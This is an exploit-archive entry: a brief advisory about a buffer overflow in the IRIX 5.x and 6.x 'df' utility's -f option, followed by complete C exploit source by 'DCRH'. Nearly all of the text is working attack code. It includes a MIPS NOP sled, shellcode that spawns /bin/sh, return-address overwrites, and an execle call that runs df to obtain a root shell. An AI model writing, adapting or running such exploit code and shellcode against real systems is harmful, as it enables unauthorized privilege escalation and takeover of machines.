source: http://www.securityfocus.com/bid/346/info A buffer overflow exists in IRIX 5.x and 6.x 'df' utility, from Silicon Graphics Inc. By supplying a long argument to the -f option of df, a user can crash the df program. By carefully crafting a buffer containing machine executable code, an attacker can run arbitrary commands as root. /* /bin/df buffer overflow exploit by DCRH */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <unistd.h> #define BUF_LENGTH 1504 #define EXTRA 700 #define OFFSET 0x200 #define IRIX_NOP 0x03e0f825 /* move $ra,$ra */ #define u_long unsigned u_long get_sp_code[] = { 0x03a01025, /* move $v0,$sp */ 0x03e00008, /* jr $ra */ 0x00000000, /* nop */ }; u_long irix_shellcode[] = { 0x24041234, /* li $4,0x1234 */ 0x2084edcc, /* sub $4,0x1234 */ 0x0491fffe, /* bgezal $4,pc-4 */ 0x03bd302a, /* sgt $6,$sp,$sp */ 0x23e4012c, /* addi $4,$31,264+36 */ 0xa086feff, /* sb $6,-264+7($4) */ 0x2084fef8, /* sub $4,264 */ 0x20850110, /* addi $5,$4,264+8 */ 0xaca4fef8, /* sw $4,-264($5) */ 0xaca6fefc, /* sw $4,-260($5) */ 0x20a5fef8, /* sub $5, 264 */ 0x240203f3, /* li $v0,1011 */ 0x03ffffcc, /* syscall 0xfffff */ 0x2f62696e, /* "/bin" */ 0x2f7368ff, /* "/sh" */ }; char buf[BUF_LENGTH + EXTRA + 8]; void main(int argc, char **argv) { char *env[] = {NULL}; u_long targ_addr, stack; u_long *long_p; int i, code_length = strlen((char *)irix_shellcode)+1; u_long (*get_sp)(void) = (u_long (*)(void))get_sp_code; stack = get_sp(); long_p =(u_long *) buf; targ_addr = stack + OFFSET; if (argc > 1) targ_addr += atoi(argv[1]) * 4; while ((targ_addr & 0xff000000) == 0 || (targ_addr & 0x00ff0000) == 0 || (targ_addr & 0x0000ff00) == 0 || (targ_addr & 0x000000ff) == 0) targ_addr += 4; for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++) *long_p++ = IRIX_NOP; for (i = 0; i < code_length/sizeof(u_long); i++) *long_p++ = irix_shellcode[i]; for (i = 0; i < EXTRA / sizeof(u_long); i++) *long_p++ = (targ_addr << 16) | (targ_addr >> 16); *long_p = 0; printf("stack = 0x%x, targ_addr = 0x%x\n", stack, targ_addr); execle("/bin/df", "df", &buf[3], 0, env); perror("execl failed"); }